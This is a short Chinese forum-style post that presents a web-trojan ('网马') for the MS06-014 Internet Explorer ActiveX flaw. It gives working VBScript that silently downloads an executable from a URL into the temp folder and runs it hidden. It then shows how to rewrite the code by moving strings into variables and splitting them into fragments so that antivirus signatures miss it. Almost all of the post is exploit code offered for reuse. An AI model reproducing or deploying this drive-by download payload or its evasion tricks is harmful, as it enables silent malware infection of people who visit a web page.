MS06014网马的一种变形方法
MS06014网马的一种变形方法 By_恒 QQ:5454443
请看原始代码
<script language="VBScript">
on error resume next
dl = "http://www.baidu.com/heng.exe"
Set df = document.createElement("object")
df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
str="Microsoft.XMLHTTP"
Set x = df.CreateObject(str,"")
a1="Ado"
a2="db."
a3="Str"
a4="eam"
str1=a1&a2&a3&a4
str5=str1
set S = df.createobject(str5,"")
S.type = 1
str6="GET"
x.Open str6, dl, False
x.Send
fname1="g0ld.com"
set F = df.createobject("Scripting.FileSystemObject","")
set tmp = F.GetSpecialFolder(2)
fname1= F.BuildPath(tmp,fname1)
S.open
S.write x.responseBody
S.savetofile fname1,2
S.close
set Q = df.createobject("Shell.Application","")
Q.ShellExecute fname1,"","","open",0
</script>
请大家看变形后的代码:
<script language="VBScript">
on error resume next
xx="object"
xxx="classid"
xxxx="clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
xxxxx="Microsoft.XMLHTTP"
xxxxxx="GET"
xxxxxxx="Scripting.FileSystemObject"
xxxxxxxx="Shell.Application"
dl = "http://www.baidu.com/heng.exe"
Set df = document.createElement(xx)
df.setAttribute xxx, xxxx
str=xxxxx
Set x = df.CreateObject(str,"")
a1="Ado"
a2="db."
a3="Str"
a4="eam"
str1=a1&a2&a3&a4
str5=str1
set S = df.createobject(str5,"")
S.type = 1
str6=xxxxxx
x.Open str6, dl, False
x.Send
fname1="g0ld.com"
set F = df.createobject(xxxxxxx,"")
set tmp = F.GetSpecialFolder(2)
fname1= F.BuildPath(tmp,fname1)
S.open
S.write x.responseBody
S.savetofile fname1,2
S.close
set Q = df.createobject(xxxxxxxx,"")
Q.ShellExecute fname1,"","","open",0
</script>
很容易就发现了,我把“”包含的内容都声明成了变量,然后在代码里直接引用变量就可以了。
a1="Ado"
a2="db."
a3="Str"
a4="eam"
str1=a1&a2&a3&a4
这个还可以变形成这样,
a1="Ado"
a2="db."
a3="Str"
a4="ea"
a5="m"
str1=a1&a2&a3&a4&a5
发现差别了吗?实际上每个字符都可以这样处理,我懒得整而已呵呵。大家自己举一反三吧。